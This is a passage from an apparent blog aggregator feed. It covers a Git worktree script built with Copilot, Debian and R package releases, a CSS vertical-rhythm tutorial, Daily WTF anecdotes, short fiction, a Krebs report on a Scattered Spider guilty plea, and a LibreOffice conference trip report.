  • if the branch exists locally or on origin, it just checks it out.
  • if the branch does not exist, we create it using the given base branch or, if no base is given, the current worktree (if we are in the root folder or bare.git the command fails).
  • as I needed it for my project, I added a --orphan option to be able to create orphan branches directly.

Moving to a single file

Eventually I decided to make the tool self contained; I removed the design document (I moved the content to comments on the top of the script and details to comments on each function definition) and added a pair of commands to print the code to source for the p10k and zsh integration (autocompletion & functions), leaving everything in a single file.

Now my .zshrc file adds the following to source both things:

# After loading the p10k configuration
if type gwt >/dev/null 2>&1; then
  source <(gwt p10k)
fi
[...]
# After loading autocompletion
if type gwt >/dev/null 2>&1; then
  source <(gwt zsh)
fi

Versioning

As I modified the script I found interesting to use CalVer-based versioning (the version variable has the format YYYY.mm.dd-r#) so I added a subcommand to show its value or bump it using the current date and computing the right revision number.

About the use of copilot

Although I’ve never been a fan of AI tools I have to admit that the copilot CLI has been very useful for building the tool:

  • Rapid prototyping: Each commit represented a small feature or fix that I could implement, test immediately in my actual workflow, and iterate on based on the result
  • Edge case handling: Rather than trying to anticipate every scenario upfront, I could ask Copilot how to handle edge cases as they appeared in real usage
  • Script refinement: Questions like "how do I clean up empty directories after a rename" or "how do I detect if I’m inside a specific worktree" were quickly answered with working code
  • Shell integration: The Zsh wrapper and completion system grew from simple prototypes to sophisticated features, with each iteration informed by how I actually used the tool

For example, the convert command started as a simple rename operation, but evolved to also create a .git symlink and intelligently handle various migration scenarios—all because I used it repeatedly and refined the implementation each time.

Self-Contained and Opinionated

gwt is deliberately opinionated:

  • Zsh & Powerlevel10k Integration: The tool includes built-in Zsh shell integration, accessed via source <(gwt zsh) and supports adding a prompt segment when using p10k, as described earlier.
  • Directory Structure: The bare.git directory name is non-negotiable. This is how gwt discovers the repository root from any subdirectory, and how the tool knows whether a directory is a gwt repository. The simplicity of this marker means the discovery mechanism is foolproof and requires no configuration.
  • No Configuration Files: gwt deliberately has no configuration. There are no .gwtrc files or config directories. This makes it portable; the tool works the same way everywhere, and repositories can be shared across systems without synchronizing configuration.

From Script to System

What started as a small helper script for managing worktrees has become a complete system:

  1. Core script (gwt): 1,111 lines of pure shell, no external dependencies
  2. Shell integration: Zsh functions and completions
  3. Prompt integration: Powerlevel10k segment
  4. Documentation: Built-in help and design philosophy documentation

The script is self-contained, everything needed for the tool to work is in a single file.

This makes it trivial to update (just replace the script) or audit (no hidden dependencies).

Development with AI support

Developing gwt with copilot taught me some things:

  • Incremental refinement works well for small tools: Each iteration informed the next, resulting in a tool that handles real use cases elegantly
  • Transparency is a feature: Making operations visible builds confidence and is easier to debug
  • Opinionated tools can be powerful: By constraining the problem space (one bare repo, one worktree per branch), the solution becomes simpler and more robust
  • Shell integration matters: The same core commands are easier to use when they can automatically change directories and provide completions
  • Real-world testing is essential: I wouldn’t have discovered the need for automatic directory cleanup or context-aware cd behavior without actually using the tool daily

What was next?

The tool is stable and handles my daily workflow well, so my guess is that I would keep using it and fixing issues if or when I found them, but I do not plan to include additional features unless I find a use case that justifies it (i.e. I never added support for some of the worktree subcommands, as it is easier to use the git versions if I ever needed them).

What really happened

While editing this post I discovered that I needed to add another command to it and fixed a bug (see below).

With those changes and the inclusion of a license and copyright notice (just in case I distribute it at some point) now the script is 1,217 lines long instead of the 1,111 it had when I started to write this entry.

Submodule Support

When I converted this blog repository to the gwt format and tried to preview the post using docker compose, it failed because the worktree I was on didn’t have the Git submodule initialized.

My blog theme is included on the repository as a submodule, and when I used gwt to check out different branches in worktrees, the submodule was not initialized in the new worktrees.

This led me to add new internal function and a gwt submodule command to handle submodule initialization; the internal function is called from convert and add (when converting a repo or adding a worktree) and the public command is useful to update the submodules on existing branches.

Path Handling with Branch Names Containing Slashes

The second discovery was a bug in how the tool handled branch names containing slashes (e.g., feature/new-api, docs/user-guide), the worktree directories are created with the branch name as the path, so a branch like feature/new-api would create two nested folders (feature and new-api inside it).

However, there was a mismatch in how the zsh wrapper function resolved worktree paths (initially it used shell parameter expansion, i.e. rel="${cwd#"$REPO_ROOT"/}"), versus how the core script calculated them, causing the cd command to fail or navigate to the wrong location when branch names contained slashes.

The fix involved ensuring consistent path resolution throughout the script and wrapper (now it uses a function that processes the git worktree list output), so that gwt cd feature/new-api correctly navigates to the worktree directory regardless of path depth.

Conclusion

gwt is a tool that solves a real problem: managing multiple Git branches simultaneously without context-switching overhead.

I’m sure I’m going to keep using it for my projects, as it simplifies some workflows, although I’ll also use switch and stash in some cases, but I like the use of multiple worktrees in parallel.

In fact I converted this blog repository checkout to the gwt format to work on a separate branch as it felt the right approach even if I’m the only one using the repo now, and it helped me improve the tool, as explained before.

Also, it was a good example of how to use AI tools like copilot to develop a simple tool and keep it evolving while using it.

In any case, although I find the copilot useful and has saved me time, I don’t trust it to work without supervision, it worked well, but got stuck some times and didn’t do the things as I wanted in multiple occasions.

I also have an additional problem now …​ I’ve been reading about it, but I don’t really know which models to use or how the premium requests are computed (I’ve only been playing with it since last month and I ran out of requests the last day of the month on purpose, just to see what happened …​ it stops working …​ ;).

On my work machine I’ve been using a specific user account with a GitHub Copilot Business subscription and I only used the Anthropic Claude Sonnet 4.6 model and with my personal account I configured the Anthropic Claude Haiku 4.5 model, but I’ve only used that to create the initial draft of this post (I ended up rewriting most of it manually anyway) and to review the final version (I’m not a native speaker and it was useful for finding typos and improving the style in some parts).

I guess I’ll try other models with copilot in the future and check other command line tools like aider or claude-code, but probably only using free accounts unless I get a payed account at work, as I have with GitHub Copilot.

To be fair, what I will love to be able to do is to use local models (aider can do it), but the machines I have are not powerful enough. I tried to run a simple test and it felt really slow, but when I have the time or the need I’ll try again, just in case.

Worse Than FailureCodeSOD: Tune Out the Static

Henrik H (previously) sends us a simple representative C# line:

static void GenerateCommercilaInvoice()

This is a static method which takes no parameters and returns nothing. Henrik didn't share the implementation, but this static function likely does something that involves side effects, maybe manipulating the database (to generate that invoice?). Or, possibly worse, it could be doing something with some global or static state. It's all side effects and no meaningful controls, so enjoy debugging that when things go wrong. Heck, good luck testing it. Our best case possibility is that it's just a wrapper around a call to a stored procedure.

This method signature is basically a commercila for refactoring.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsDéjà vu

Author: Kewei Chen I have been staying in this mountain temple for a long time, long enough that I’ve grown used to its rhythm. The place feels colder than I remember. Not sharply so, just something you notice before fully awake. The wooden floor beneath me still holds last night’s cold a little too long. […]

The post Déjà vu appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: nanotime 0.3.14 on CRAN: Upstream Maintenance

Another minor update 0.3.14 for our nanotime package is now on CRAN, and has compiled for r2u (and will have to wait to be uploaded to Debian until dependency bit64 has been updated there). nanotime relies on the RcppCCTZ package (as well as the RcppDate package for additional C++ operations) and offers efficient high(er) resolution time parsing and formatting up to nanosecond resolution, using the bit64 package for the actual integer64 arithmetic. Initially implemented using the S3 system, it has benefitted greatly from a rigorous refactoring by Leonardo who not only rejigged nanotime internals in S4 but also added new S4 types for periods, intervals and durations.

This release has been driven almost entirely by Michael, who took over as bit64 maintainer and has been making changes there that have an effect on us ‘downstream’. He reached out with a number of PRs which (following occassional refinement and smoothing) have all been integrated. There are no user-facing changes, or behavioural changes or enhancements, in this release.

The NEWS snippet below has the fuller details.

Changes in version 0.3.14 (2026-04-22)

  • Tests were refactored to use NA_integer64_ (Michael Chirico in #149 and Dirk in #156)

  • nanoduration was updated for changes in nanotime 4.8.0 (Michael Chirico in #152 fixing #151)

  • Use of as.integer64(keep.names=TRUE) has been refactored (Michael Chirico in #154 fixing #153)

  • In tests, nanotime is attached after bit64; this still needs a better fix (Michael Chirico in #155)

  • The package now has a hard dependency on the just released bit64 version 4.8.0 (or later)

Thanks to my CRANberries, there is a diffstat report for this release. More details and examples are at the nanotime page; code, issue tickets etc at the GitHub repository – and all documentation is provided at the nanotime documentation site.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianVincent Bernat: CSS & vertical rhythm for text, images, and tables

Vertical rhythm aligns lines to a consistent spacing cadence down the page. It creates a predictable flow for the eye to follow. Thanks to the rlh CSS unit, vertical rhythm is now easier to implement for text.1 But illustrations and tables can disrupt the layout. The amateur typographer in me wants to follow Bringhurst’s wisdom:

Headings, subheads, block quotations, footnotes, illustrations, captions and other intrusions into the text create syncopations and variations against the base rhythm of regularly leaded lines. These variations can and should add life to the page, but the main text should also return after each variation precisely on beat and in phase.

― Robert Bringhurst, The Elements of Typographic Style

Text

Three factors govern vertical rhythm: font size, line height and margin or padding. Let’s set our baseline with an 18-pixel font and a 1.5 line height:

html {
  font-size: 112.5%;
  line-height: 1.5;
}
h1, h2, h3, h4 {
  font-size: 100%;
}
html, body,
h1, h2, h3, h4,
p, blockquote,
dl, dt, dd, ol, ul, li {
  margin: 0;
  padding: 0;
}

CSS Values and Units Module Level 4 defines the rlh unit, equal to the computed line height of the root element. All browsers support it since 2023.2 Use it to insert vertical spaces or to fix the line height when altering font size:3

h1, h2, h3, h4 {
  margin-top: 2rlh;
  margin-bottom: 1rlh;
}
h1 {
  font-size: 2.4rem;
  line-height: 2rlh;
}
h2 {
  font-size: 1.5rem;
  line-height: 1rlh;
}
h3 {
  font-size: 1.2rem;
  line-height: 1rlh;
}
p, blockquote, pre {
  margin-top: 1rlh;
}
aside {
  font-size: 0.875rem;
  line-height: 1rlh;
}

We can check the result by overlaying a grid4 on the content:

Screenshot of my website with a grid as an overlay and each line of text fitting on the grid
Using CSS rlh unit to set vertical space works well for text. You can display the grid using Ctrl+Shift+G.

If a child element uses a font with taller intrinsic metrics, it may stretch the line’s box beyond the configured line height.5 A workaround is to reduce the line height to 1. The glyphs overflow but don’t push the line taller.

code, kbd {
  line-height: 1;
}

Responsive images

Responsive images are difficult to align on the grid because we don’t know their height. CSS Rhythmic Sizing Module Level 1 introduces the block-step property to adjust the height of an element to a multiple of a step unit. But most browsers don’t support it yet.

With JavaScript, we can add padding around the image so it does not disturb the vertical rhythm:

const targets = document.querySelectorAll(".lf-media-outer");
const adjust = (el, height) => {
  const rlh = parseFloat(getComputedStyle(document.documentElement).lineHeight);
  const padding = Math.ceil(height / rlh) * rlh - height;
  el.style.padding = `${padding / 2}px 0`;
};

targets.forEach((el) => adjust(el, el.clientHeight));
Screenshot of my website with a grid as an overlay and an image not breaking the vertical rhythm. Additional padding is visible before and after the image. The height of the image with padding is 216.
The image is snapped to the grid thanks to the additional padding computed with JavaScript. 216 is divisible by 27, our line height in this example.

As the image is responsive, its height can change. We need to wrap a resize observer around the adjust() function:

const ro = new ResizeObserver((entries) => {
  for (const entry of entries) {
    const height = entry.contentBoxSize[0].blockSize;
    adjust(entry.target, height);
  }
});
for (const target of targets) {
  ro.observe(target);
}

Tables

Table cells could set 1rlh as their height but they would feel constricted. Using 2rlh wastes too much space. Instead, we use incremental leading: we align one in every five lines.

table {
  border-spacing: 2px 0;
  border-collapse: separate;
  th {
    padding: 0.4rlh 1em;
  }
  td {
    padding: 0.2rlh 0.5em;
  }
}

To align the elements after the table, we need to add some padding. We can either reuse the JavaScript code from images or use a few lines of CSS that count the regular rows and compute the missing vertical padding:

table:has(tbody tr:nth-child(5n):last-child)   { padding-bottom: 0.2rlh; }
table:has(tbody tr:nth-child(5n+1):last-child) { padding-bottom: 0.8rlh; }
table:has(tbody tr:nth-child(5n+2):last-child) { padding-bottom: 0.4rlh; }
table:has(tbody tr:nth-child(5n+3):last-child) { padding-bottom: 0 }
table:has(tbody tr:nth-child(5n+4):last-child) { padding-bottom: 0.6rlh; }

A header cell has twice the padding of a regular cell. With two regular rows, the total padding is 2×2×0.2+2×0.4=1.6. We need to add 0.4rlh to reach 2rlh of extra vertical padding across the table.

Screenshot of my website with a grid as an overlay and a table following the vertical rhythm. Additional padding is visible after the table. The height of the table with padding is 405.
One line out of five is aligned to the grid. Additional padding is added after the table to not break the vertical rhythm. 405 is divisible by 27, our line height in this example.

None of this is necessary. But once you start looking, you can’t unsee it. Until browsers implement CSS Rhythmic Sizing, a bit of CSS wizardry and a touch of JavaScript is enough to pull it off. The main text now returns after each intrusion “precisely on beat and in phase.� �


  1. See “Vertical rhythm using CSS lh and rlh units� by Paweł Grzybek. ↩

  2. For broader compatibility, you can replace 2rlh with calc(var(--line-height) * 2rem) and set the --line-height custom property in the :root pseudo-class. I wrote a simple PostCSS plugin for this purpose. ↩

  3. It would have been nicer to compute the line height with calc(round(up, calc(2.4rem / 1rlh), 0) * 1rlh). Unfortunately, typed arithmetic is not supported by Firefox yet. Moreover, browsers support round() only since 2024. Instead, I coded a PostCSS plugin for this as well. ↩

  4. The following CSS code defines a grid tracking the line height:

    body {
      position: relative;
    }
    body::after {
      content: "";
      position: absolute;
      inset: 0;
      z-index: 9999;
      background: linear-gradient(180deg, #c8e1ff99 1px, transparent 1px);
      background-size: 20px 1rlh;
      pointer-events: none;
    }
    

    ↩

  5. See “Deep dive CSS: font metrics, line-height and vertical-align� by Vincent De Oliveira. ↩

Cryptogram ICE Uses Graphite Spyware

ICE has admitted that it uses spyware from the Israeli company Graphite.

Worse Than FailureRepresentative Line: Comment Overflow

Today, we look at a representative comment, sent to us by Nona. This particular comment was in a pile of code delivered by an offshore team.

// https://stackoverflow.com/questions/46744740/lodash-mongoose-object-id-difference/46745169

"Wait," you say, "what's the WTF about a comment pointing to a Stack Overflow page. I do that all the time?"

In this case, it's because this particular comment wasn't given any further explanation. It also wasn't in a block of code that was doing anything with either lodash, Mongoose, or set differences. It was, however, repeated multiple times throughout the codebase, because the entire codebase was a pile of copy-pasta glued together with the bare minimum code to make it work.

In at least one place, the comment was probably correct and helpful. But it got swept up as part of a broader copy/paste exercise, and now is scattered through the code without any true purpose.

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsThe Engineer

Author: Mark Renney Cartwright tends to the machine, the work is all-consuming but perfunctory at best. He cleans the machine and he replaces the data chips. It is vital this is done in the correct order and at the opportune moment, when the machine is able to upload that particular information. The machine and the […]

The post The Engineer appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: RcppArmadillo 15.2.6-1 on CRAN: Several Updates

armadillo image

Armadillo is a powerful and expressive C++ template library for linear algebra and scientific computing. It aims towards a good balance between speed and ease of use, has a syntax deliberately close to Matlab, and is useful for algorithm development directly in C++, or quick conversion of research code into production environments. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 1263 other packages on CRAN, downloaded 45.7 million times (per the partial logs from the cloud mirrors of CRAN), and the CSDA paper (preprint / vignette) by Conrad and myself has been cited 683 times according to Google Scholar.

This versions updates to the 15.2.5 and 15.2.6 upstream Armadillo releases from, respectively, two and five days ago. The package has already been updated for Debian, and built for r2u. When we ran the reverse-dependency check for 15.2.5 at the end of last week, one package failed. I got in touch with the authors, filed an issue, poked some more, isolated the one line that caused an example to fail … and right then 15.2.6 came out fixing just that. It was after all an upstream issue. We used to ran these checks before Conrad made a release, he now skips this and hence needed a quick follow-up release. It can happen.

The other big change is that this R package release phases out the ‘dual support’ for both C++14 or newer (as in current Armadillo) along with a C++11 fallback for more slowly updating packages. I am happy to say that after over eight months of this managed transition (during which CRAN expulsed some laggard packages that were not moving in from C++11) we are now at all packages using C++14 or newer which is nice. And I will take this as an opportunity to stress that one can in fact manage a disruptive API change this way as we just demonstrated. Sadly, R Core does not seem to have gotten that message and rollout of this package was also still a little delayed because of the commotion created by the last minute API changes preceding the R 4.6.0 release later this week.

Smaller changes in the package are a switch in pdf vignette production to the Rcpp::asis() driver, and a higher-precision computation in rmultinom() (matching a change made in R-devel during last week in its use of Kahan summation). All detailed changes since the last CRAN release follow.

Changes in RcppArmadillo version 15.2.6-1 (2026-04-20)

  • Upgraded to Armadillo release 15.2.6 (Medium Roast Deluxe)

    • Ensure internally computed tolerances are not NaN
  • The rmultinom deploys 'Kahan summation' as R-devel does now.

Changes in RcppArmadillo version 15.2.5-1 [github-only] (2026-04-18)

  • Upgraded to Armadillo release 15.2.5 (Medium Roast Deluxe)

    • Fix for handling NaN elements in .is_zero()

    • Fix for handling NaN in tolerance and conformance checks

    • Faster handling of diagonal views and submatrices with one row>

  • Sunset the C++11 fallback of including Armadillo 14.6.3 (#504 closing #503)

  • The vignettes have refreshed bibliographies, and are now built using the Rcpp::asis vignette builder (#506)

  • One rmultinom test is skipped under R-devel which has switched to a higher precisions calc

Courtesy of my CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the Rcpp R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianMike Gabriel: Join us at Lomiri CodeFest on May 16-17 & Fre(i)e Software GmbH is hiring more Lomiri Developers

Lomiri Codefest in Tilburg NL (May 16-17 2026)

Just a quick invitation to an in-person event in Tilburg, the Netherlands.

All people interested in the Lomiri Operating Environment are invited to join us at the Lomiri Codefest [codefest] taking place on May 16-17 (participation is free of charge).

We are hiring Lomiri developers

And as another side node, we still have budget (until 07/2027) for 2-3 additional Lomiri developers (depends on each devs weekly availability). The details of my previous post [hiringdetails] +/- still apply. One more limitation / strength: You need real coding skills to apply for the open positions, AI-generated contributions will not be accepted for the tasks at hand.

If you are interested and a skilled FLOSS developer (you need previous OSS contributions as references) and available with at least 10 hrs / week, please get in touch [fsgmbh].

References

[codefest] https://codefest.os-sci.info/?lang=en
[hiringdetails] https://sunweavers.net/blog/node/150
[fsgmbh] https://freiesoftware.gmbh/

Planet DebianSergio Cipriano: How to view the Debian Upload Queue

How to view the Debian Upload Queue

Some people may not know this, but the Debian Upload Queue is public and very easy to access:

$ curl ftp://ftp.upload.debian.org/pub/UploadQueue/
drwxr-sr-x   18 1518     1281         4096 Jun 26  2019 DELAYED
-rw-r--r--    1 1518     1281         3442 Jul 14  2025 README
-rw-r-----    1 117      1281         3052 Apr 20 21:32 neovim-tokyonight_4.14.1-1.debian.tar.xz
-rw-r-----    1 117      1281         2119 Apr 20 21:32 neovim-tokyonight_4.14.1-1.dsc
-rw-r-----    1 117      1281         5533 Apr 20 21:32 neovim-tokyonight_4.14.1-1_amd64.buildinfo
-rw-r-----    1 117      1281         2637 Apr 20 21:32 neovim-tokyonight_4.14.1-1_source.changes
-rw-r-----    1 117      1281       197584 Apr 20 21:32 neovim-tokyonight_4.14.1.orig.tar.gz

Krebs on Security‘Scattered Spider’ Member ‘Tylerb’ Pleads Guilty

A 24-year-old British national and senior member of the cybercrime group “Scattered Spider” has pleaded guilty to wire fraud conspiracy and aggravated identity theft. Tyler Robert Buchanan admitted his role in a series of text-message phishing attacks in the summer of 2022 that allowed the group to hack into at least a dozen major technology companies and steal tens of millions of dollars worth of cryptocurrency from investors.

Buchanan’s hacker handle “Tylerb” once graced a leaderboard in the English-language criminal hacking scene that tracked the most accomplished cyber thieves. Now in U.S. custody and awaiting sentencing, the Dundee, Scotland native is facing the possibility of more than 20 years in prison.

A screenshot of two photos of Buchanan that appeared in a Daily Mail story dated May 3, 2025.

Two photos published in a Daily Mail story dated May 3, 2025 show Buchanan as a child (left) and as an adult being detained by airport authorities in Spain. “M&S” in this screenshot refers to Marks & Spencer, a major U.K. retail chain that suffered a ransomware attack last year at the hands of Scattered Spider.

Scattered Spider is the name given to a prolific English-speaking cybercrime group known for using social engineering tactics to break into companies and steal data for ransom, often impersonating employees or contractors to deceive IT help desks into granting access.

As part of his guilty plea, Buchanan admitted conspiring with other Scattered Spider members to launch tens of thousands of SMS-based phishing attacks in 2022 that led to intrusions at a number of technology companies, including Twilio, LastPass, DoorDash, and Mailchimp.

The group then used data stolen in those breaches to carry out SIM-swapping attacks that siphoned funds from individual cryptocurrency investors. In an unauthorized SIM-swap, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — such as one-time passcodes for authentication and password reset links sent via SMS. The U.S. Justice Department said Buchanan admitted to stealing at least $8 million in virtual currency from individual victims throughout the United States.

FBI investigators tied Buchanan to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous phishing domains seen in the campaign. The domain registrar NameCheap found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan throughout 2022.

As first reported by KrebsOnSecurity, Buchanan fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. That same year, U.K. investigators found a device at Buchanan’s Scotland residence that included data stolen from SMS phishing victims and seed phrases from cryptocurrency theft victims.

Buchanan was arrested by Spanish authorities in June 2024 while trying to board a flight to Italy. He was extradited to the United States and has remained in U.S. federal custody since April 2025.

Buchanan is the second known Scattered Spider member to plead guilty. Noah Michael Urban, 21, of Palm Coast, Fla., was sentenced to 10 years in federal prison last year and ordered to pay $13 million in restitution. Three other alleged co-conspirators — Ahmed Hossam Eldin Elbadawy, 24, a.k.a. “AD,” of College Station, Texas; Evans Onyeaka Osiebo, 21, of Dallas, Texas; and Joel Martin Evans, 26, a.k.a. “joeleoli,” of Jacksonville, North Carolina – still face criminal charges.

Two other alleged Scattered Spider members will soon be tried in the United Kingdom. Owen Flowers, 18, and Thalha Jubair, 20, are facing charges related to the hacking and extortion of several large U.K. retailers, the London transit system, and healthcare providers in the United States. Both have pleaded not guilty, and their trial is slated to begin in June.

Investigators say the Scattered Spider suspects are part of a sprawling cybercriminal community online known as “The Com,” wherein hackers from different cliques boast publicly on Telegram and Discord about high-profile cyber thefts that almost invariably begin with social engineering — tricking people over the phone, email or SMS into giving away credentials that allow remote access to corporate internal networks.

One of the more popular SIM-swapping channels on Telegram has long maintained a leaderboard of the most rapacious SIM-swappers, indexed by their supposed conquests in stealing cryptocurrency. That leaderboard previously listed Buchanan’s hacker alias Tylerb at #65 (out of 100 hackers), with Urban’s moniker “Sosa” coming in at #24.

Buchanan’s sentencing hearing is scheduled for August 21, 2026. According to the Justice Department, he faces a statutory maximum sentence of 22 years in federal prison. However, any sentence the judge hands down in this case may be significantly tempered by a number of mitigating factors in the U.S. Sentencing Guidelines, including the defendant’s age, criminal history, time already served in U.S. custody, and the degree to which they cooperated with federal authorities.

Cryptogram Mexican Surveillance Company

Grupo Seguritech is a Mexican surveillance company that is expanding into the US.

Planet DebianRussell Coker: More About Ebook Readers in Debian

FBReader

After my previous blog post about eBook readers in Debian [1] a reader recommended FBReader. I tried it and it’s now my favourite reader. It works nicely on laptop and phone and takes significantly less RAM than Calibre or Arianna (especially important for phones). While the problems with my FLX1s not displaying text with Calibre or Arianna might be the fault of something on the FLX1s side those problems just don’t happen with FBReader.

FBReader has apparently now got a proprietary version as the upstream, but we still have FOSS code to use in Debian. It would be nice if someone updated it to store the reading location using WebDAV and/or a local file that can be copied with the NextCloud client or similar. Currently there is code to store reading location in the Google cloud which I don’t want to use. It’s not THAT difficult to see what chapter you are at with one device and just skip to that part on another, but it is an annoyance.

One thing I really like about FBReader is that you can run it with a epub file on the command line and it just opens it and when it’s been closed you can just open it again to the same spot in the same file. I don’t want a “library” to view a book list, I just want to go back to what I was last reading in a hurry. Calibre might be better for some uses, for example I can imagine someone in the publishing industry with a collection of thousands of epub files finding that Calibre works better for them. But for the typical person who just wants to read one book and keep reading it until they finish it FBReader seems clearly better. The GUI is a little unusual, but it’s not at all confusing and it works really well on mobile.

Okular

I tried Okular (the KDE viewer for PDF files etc) which displays epub files if you have the “okular-extra-backends” installed, but it appears to not display books with the background color set to black. I would appreciate it if someone who has read some public domain or CC licences epub files can recommend ones with a black background that I could use for testing as I can’t file a Debian bug report without sample data to reproduce the bug. I decided not to use it for actual book reading as FBReader is far better for my use taking less RAM and being well optimised for mobile use.

Folite

Foliate supports specifying a book on the command-line which is nice. But it takes more memory than FBReader which is probably mostly due to using webkit to display things. The output was in 2 columns on my laptop in small text which is probably configurable but I didn’t proceed with it. I determined that it doesn’t compare with FBReader for my use. It’s written in JavaScript which may be a positive feature for some people.

Koodo

I had a brief test of Koodo which isn’t in Debian. Here is the Koodo Reader Github [2]. I installed the .deb that they created, it installs files to “/opt/Koodo Reader/” (yes that’s a space in the directory name) and appears to have Chromium as part of the runtime. I didn’t go past that even though it appears to have a decent feature set. It is licensed under version 3 of the AGPL so is suitable for Debian packaging if someone wants to do it.

Thorium

I saw the Thorium reader on Github [3] which looks promising, it’s under the BSD 3 clause license so is suitable for Debian packaging. The EDR Lab seems like a good project for advancing electronic document use [4] and it would be good to have their stuff in Debian.

For the moment I’m happy using FBReader.

365 TomorrowsMcPhysics

Author: Majoki Philomena paced the floor of the lab. “It’s the only thing that will do the trick.” “Quantum bacon?” “Of course, quantum bacon. What else is going to attract the right kind of scientists to work here?” “And who exactly are the ‘right kind’ of scientists?” Akira asked. Philomena smiled her patient and most […]

The post McPhysics appeared first on 365tomorrows.

Worse Than FailureTurning Thirty

Eric O worked for a medical device company. The medical device industry moves slowly, relative to other technical industries. Medical science and safety have their own cadence, and at a certain point, iterating faster doesn't matter much.

Eric was working on a new feature on a system that had been in use for thirteen years. This new feature interacted with a database which stored information about racks of test tubes, and Eric's tests meant creating several entries for racks of test tubes. And that's when Eric discovered that the database only allowed thirty racks. Add any more, it would just roll right back over to one.

This was odd. The database was small- less than 40MB, even in production- and there were automatic tasks to purge old data for compliance purposes. Why a hard limit of thirty?

Eric had only been at the company for a year, so he asked one of the more senior team members, Lester. "Oh yeah, that was before my time. You should probably ask Carl."

Later that day, Eric happened to bump into Carl around the coffee maker, and asked the question. "Oh, yeah, I do vaguely remember something about that. It was in the requirements for the product. I thought it was weird, but didn't think too much about it. You should probably ask Elise, she's been here like twenty years."

Well, now it was getting curious. Eric went over to the "old building", as it was named, the original office for the company on the other side of the parking lot. Most of the offices had moved to the new building a decade earlier, and it mostly served as fabrication and storage, but a few offices remained.

Elise was on the third floor, down a poorly lit hallway, sitting in an office with water-stained acoustical tile in its ceiling. "Oh, yeah, I put that into the requirements document. It's funny, I thought it was weird too, but the system you're working on was a replacement for an older system. Our requirements were derived from those. Let me think… Irving worked on that, but he's dead, god rest him. Penny is retired. Oh, you know, Humbert is still around. He didn't work on that, but he worked on some of the systems that came before that. He's upstairs and on the other side of the building."

Eric went upstairs and to the other side of the building. The fourth floor had been last remodeled circa 1985, and the ugly industrial paint on the wall was made even uglier by the fact that someone had replaced most of the flourescent tubes with LEDs. Most. The mismatched color temperature started Eric down the path of a headache.

Humbert was in an office similar to Elise's. On his desk was a plaque commemerating 40 years of service with the company. Eric asked about the limitation, and Humbert laughed.

"You're working on the latest version of a product that initially started on an old PDP-11 running MUMPS. I mean, the first versions, anyway. We ran to desktop computers as fast as we could. I wrote a version for DOS in… oh… '86? I knew none of the facilities we worked with had more than ten or fifteen racks of tubes, and I needed somehow to limit the size of the database so it all fit on a single 5 1/4" floppy disk. I picked thirty, because it seemed like a good round number. Honestly, I'm shocked that the limit still exists."

So was Eric. There had been several ground-up-rewrites since 1986, before the one Eric maintained had been released thirteen years ago. Each one of them had chosen to maintain the same limitation, without ever considering why it existed. The rule had simply been copied, mindlessly, for 40 years.

"I'm kind of impressed," Eric said to Humbert, "in a horrified way."

"Me too, kid, me too."

[Advertisement] Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.

Planet DebianRavi Dwivedi: LibreOffice Conference Budapest 2025

In September 2025, I attended the LibreOffice Conference in Budapest, Hungary, on the 4th and the 5th, and a community meeting on the 3rd. Thanks to The Document Foundation (TDF) for sponsoring my travel and accommodation costs. The conference venue was Faculty of Informatics, Eötvös Loránd University (ELTE).

The conference was planned to be held from the 4th to the 6th, but the program for the 6th of September had to be canceled due to the venue being unavailable because of a marathon in Budapest. So, all the talks got squeezed into just two days, making the schedule a bit hectic.

The TDF had booked my room at the Corvin Hotel. It was a double bedroom with a window. The breakfast was included in the hotel booking. The hotel was walking distance from the conference venue. One could also take a tram from the hotel to reach the venue.

A double bed

A shot of my room. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Tram

A tram in Budapest. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

3rd of September

On the 3rd of September, we had a community meeting at the above-mentioned venue. I walked with my friend Dione to the venue. Upon reaching there, I noticed that the university had no boundaries and gates. This reminded me of the previous year’s conference venue in Luxembourg, which also had no boundaries or gates.

In contrast, Indian universities and institutes typically have walls and gates serving as boundaries to separate them from the rest of the city. Many of these institutes also have security guards at the entrance, who may ask attendees to present proof of admission before allowing them inside. I was surprised to find that institutes in Europe, like the one where the conference was held, did not have such boundaries.

The building where the conference was held was red, which happened to be the same color as the building for the previous year’s conference venue. I remember joking with Dione that the criteria for the conference venue might have been the color of the building.

A red building

The red building in the picture served as the conference venue. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

During the community meeting, we shared ideas on how to spread the word about LibreOffice. The meeting lasted for a couple of hours.

After the community meeting, we went to the hotel for dinner sponsored by the TDF.

Cake slices

These Esterházy cake bites were really yummy. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Raspberry Currant cake slices

Raspberry Currant cake slices. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

4th of September

On the first day of the conference, attendees were given swag bags containing a pad, sticky notes, a pen, a conference T-shirt, and a bottle.

A blue colored T-shirt on a bed along with a pen, a bottle, a diary and a sticky note

Conference swag. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

